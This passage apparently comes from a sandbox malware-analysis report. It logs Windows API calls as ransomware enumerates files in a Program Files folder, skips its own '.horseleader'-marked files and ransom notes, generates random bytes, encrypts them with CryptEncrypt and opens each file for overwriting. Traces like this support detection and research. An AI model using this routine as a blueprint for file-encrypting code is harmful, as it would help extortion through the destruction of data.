ftCreationTime.dwLowDateTime=0x700ec2d0, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x700ec2d0, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4dda33b1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc24, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="redmenu.png", cAlternateFileName="")) returned 1 [0251.667] lstrcmpiW (lpString1="redmenu.png", lpString2="Windows") returned -1 [0251.667] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\redmenu.png") returned 71 [0251.667] StrStrIW (lpFirst="redmenu.png", lpSrch=".horseleader") returned 0x0 [0251.667] lstrcmpW (lpString1="redmenu.png", lpString2="#Decrypt#.txt") returned 1 [0251.667] lstrcmpW (lpString1="redmenu.png", lpString2="_uninstalling_.png") returned 1 [0251.667] lstrlenW (lpString=".testttjffg") returned 11 [0251.667] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\redmenu.png", lpSrch=".testttjffg") returned 0x0 [0251.667] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.667] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.667] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\redmenu.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\redmenu.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.668] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70327743, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70327743, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ddc950f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x8232c, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Scene_loop.wmv", cAlternateFileName="")) returned 1 [0251.668] lstrcmpiW (lpString1="Scene_loop.wmv", lpString2="Windows") returned -1 [0251.668] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Scene_loop.wmv") returned 74 [0251.668] StrStrIW (lpFirst="Scene_loop.wmv", lpSrch=".horseleader") returned 0x0 [0251.668] lstrcmpW (lpString1="Scene_loop.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.668] lstrcmpW (lpString1="Scene_loop.wmv", lpString2="_uninstalling_.png") returned 1 [0251.668] lstrlenW (lpString=".testttjffg") returned 11 [0251.668] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Scene_loop.wmv", lpSrch=".testttjffg") returned 0x0 [0251.668] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.668] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.668] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Scene_loop.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\scene_loop.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.669] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70399b5a, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70399b5a, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4de61a87, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x95bac, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Scene_loop_PAL.wmv", cAlternateFileName="")) returned 1 [0251.669] lstrcmpiW (lpString1="Scene_loop_PAL.wmv", lpString2="Windows") returned -1 [0251.669] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Scene_loop_PAL.wmv") returned 78 [0251.669] StrStrIW (lpFirst="Scene_loop_PAL.wmv", lpSrch=".horseleader") returned 0x0 [0251.669] lstrcmpW (lpString1="Scene_loop_PAL.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.669] lstrcmpW (lpString1="Scene_loop_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0251.669] lstrlenW (lpString=".testttjffg") returned 11 [0251.669] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Scene_loop_PAL.wmv", lpSrch=".testttjffg") returned 0x0 [0251.669] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.669] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.670] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Scene_loop_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\scene_loop_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.670] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7011242d, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7011242d, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4e53996b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x99, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="TitleButtonIcon.png", cAlternateFileName="")) returned 1 [0251.670] lstrcmpiW (lpString1="TitleButtonIcon.png", lpString2="Windows") returned -1 [0251.670] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\TitleButtonIcon.png") returned 79 [0251.670] StrStrIW (lpFirst="TitleButtonIcon.png", lpSrch=".horseleader") returned 0x0 [0251.670] lstrcmpW (lpString1="TitleButtonIcon.png", lpString2="#Decrypt#.txt") returned 1 [0251.670] lstrcmpW (lpString1="TitleButtonIcon.png", lpString2="_uninstalling_.png") returned 1 [0251.670] lstrlenW (lpString=".testttjffg") returned 11 [0251.670] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\TitleButtonIcon.png", lpSrch=".testttjffg") returned 0x0 [0251.670] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.670] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.670] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\TitleButtonIcon.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\titlebuttonicon.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.671] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7011242d, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7011242d, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4e53996b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x84, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="TitleButtonSubpicture.png", cAlternateFileName="")) returned 1 [0251.671] lstrcmpiW (lpString1="TitleButtonSubpicture.png", lpString2="Windows") returned -1 [0251.672] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\TitleButtonSubpicture.png") returned 85 [0251.672] StrStrIW (lpFirst="TitleButtonSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.672] lstrcmpW (lpString1="TitleButtonSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.672] lstrcmpW (lpString1="TitleButtonSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.672] lstrlenW (lpString=".testttjffg") returned 11 [0251.672] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\TitleButtonSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.672] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.672] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.672] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\TitleButtonSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\titlebuttonsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.672] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x703e5e14, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x703e5e14, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ded3ea1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1a9204, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Title_Page.wmv", cAlternateFileName="")) returned 1 [0251.672] lstrcmpiW (lpString1="Title_Page.wmv", lpString2="Windows") returned -1 [0251.673] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page.wmv") returned 74 [0251.673] StrStrIW (lpFirst="Title_Page.wmv", lpSrch=".horseleader") returned 0x0 [0251.673] lstrcmpW (lpString1="Title_Page.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.673] lstrcmpW (lpString1="Title_Page.wmv", lpString2="_uninstalling_.png") returned 1 [0251.673] lstrlenW (lpString=".testttjffg") returned 11 [0251.673] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page.wmv", lpSrch=".testttjffg") returned 0x0 [0251.673] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.673] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.673] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_page.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.673] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7047e388, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7047e388, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4e050c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1d0304, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Title_Page_PAL.wmv", cAlternateFileName="")) returned 1 [0251.673] lstrcmpiW (lpString1="Title_Page_PAL.wmv", lpString2="Windows") returned -1 [0251.673] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv") returned 78 [0251.673] StrStrIW (lpFirst="Title_Page_PAL.wmv", lpSrch=".horseleader") returned 0x0 [0251.673] lstrcmpW (lpString1="Title_Page_PAL.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.674] lstrcmpW (lpString1="Title_Page_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0251.674] lstrlenW (lpString=".testttjffg") returned 11 [0251.674] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv", lpSrch=".testttjffg") returned 0x0 [0251.674] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.674] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.674] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Page_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_page_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.674] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70588d13, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70588d13, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4e1a789b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xad264, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="title_trans_notes.wmv", cAlternateFileName="")) returned 1 [0251.674] lstrcmpiW (lpString1="title_trans_notes.wmv", lpString2="Windows") returned -1 [0251.674] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\title_trans_notes.wmv") returned 81 [0251.674] StrStrIW (lpFirst="title_trans_notes.wmv", lpSrch=".horseleader") returned 0x0 [0251.674] lstrcmpW (lpString1="title_trans_notes.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.674] lstrcmpW (lpString1="title_trans_notes.wmv", lpString2="_uninstalling_.png") returned 1 [0251.675] lstrlenW (lpString=".testttjffg") returned 11 [0251.675] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\title_trans_notes.wmv", lpSrch=".testttjffg") returned 0x0 [0251.675] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.675] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.675] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\title_trans_notes.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_trans_notes.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.676] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x705fb12a, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x705fb12a, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4e1f3b57, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb4f64, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Title_Trans_Notes_PAL.wmv", cAlternateFileName="")) returned 1 [0251.676] lstrcmpiW (lpString1="Title_Trans_Notes_PAL.wmv", lpString2="Windows") returned -1 [0251.676] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Trans_Notes_PAL.wmv") returned 85 [0251.676] StrStrIW (lpFirst="Title_Trans_Notes_PAL.wmv", lpSrch=".horseleader") returned 0x0 [0251.676] lstrcmpW (lpString1="Title_Trans_Notes_PAL.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.676] lstrcmpW (lpString1="Title_Trans_Notes_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0251.676] lstrlenW (lpString=".testttjffg") returned 11 [0251.676] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Trans_Notes_PAL.wmv", lpSrch=".testttjffg") returned 0x0 [0251.676] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.676] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.676] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Trans_Notes_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_trans_notes_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.677] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7066d541, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7066d541, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4e23fe13, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x999e4, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="title_trans_scene.wmv", cAlternateFileName="")) returned 1 [0251.677] lstrcmpiW (lpString1="title_trans_scene.wmv", lpString2="Windows") returned -1 [0251.677] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\title_trans_scene.wmv") returned 81 [0251.677] StrStrIW (lpFirst="title_trans_scene.wmv", lpSrch=".horseleader") returned 0x0 [0251.677] lstrcmpW (lpString1="title_trans_scene.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.677] lstrcmpW (lpString1="title_trans_scene.wmv", lpString2="_uninstalling_.png") returned 1 [0251.677] lstrlenW (lpString=".testttjffg") returned 11 [0251.677] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\title_trans_scene.wmv", lpSrch=".testttjffg") returned 0x0 [0251.677] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.677] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.677] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\title_trans_scene.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_trans_scene.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.678] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70705ab5, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70705ab5, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4e53996b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa16e4, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="Title_Trans_Scene_PAL.wmv", cAlternateFileName="")) returned 1 [0251.678] lstrcmpiW (lpString1="Title_Trans_Scene_PAL.wmv", lpString2="Windows") returned -1 [0251.678] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Trans_Scene_PAL.wmv") returned 85 [0251.678] StrStrIW (lpFirst="Title_Trans_Scene_PAL.wmv", lpSrch=".horseleader") returned 0x0 [0251.678] lstrcmpW (lpString1="Title_Trans_Scene_PAL.wmv", lpString2="#Decrypt#.txt") returned 1 [0251.678] lstrcmpW (lpString1="Title_Trans_Scene_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0251.678] lstrlenW (lpString=".testttjffg") returned 11 [0251.678] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Trans_Scene_PAL.wmv", lpSrch=".testttjffg") returned 0x0 [0251.678] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.678] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.678] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Title_Trans_Scene_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\title_trans_scene_pal.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.678] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70079eb9, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70079eb9, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4e53996b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1a3c, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="userContent_16x9_imagemask.png", cAlternateFileName="")) returned 1 [0251.678] lstrcmpiW (lpString1="userContent_16x9_imagemask.png", lpString2="Windows") returned -1 [0251.679] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\userContent_16x9_imagemask.png") returned 90 [0251.679] StrStrIW (lpFirst="userContent_16x9_imagemask.png", lpSrch=".horseleader") returned 0x0 [0251.679] lstrcmpW (lpString1="userContent_16x9_imagemask.png", lpString2="#Decrypt#.txt") returned 1 [0251.679] lstrcmpW (lpString1="userContent_16x9_imagemask.png", lpString2="_uninstalling_.png") returned 1 [0251.679] lstrlenW (lpString=".testttjffg") returned 11 [0251.679] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\userContent_16x9_imagemask.png", lpSrch=".testttjffg") returned 0x0 [0251.679] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.679] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.679] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\userContent_16x9_imagemask.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\usercontent_16x9_imagemask.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.679] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x700c6173, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x700c6173, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4e53996b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2ee8, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="whitemenu.png", cAlternateFileName="")) returned 1 [0251.679] lstrcmpiW (lpString1="whitemenu.png", lpString2="Windows") returned -1 [0251.679] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\whitemenu.png") returned 73 [0251.679] StrStrIW (lpFirst="whitemenu.png", lpSrch=".horseleader") returned 0x0 [0251.680] lstrcmpW (lpString1="whitemenu.png", 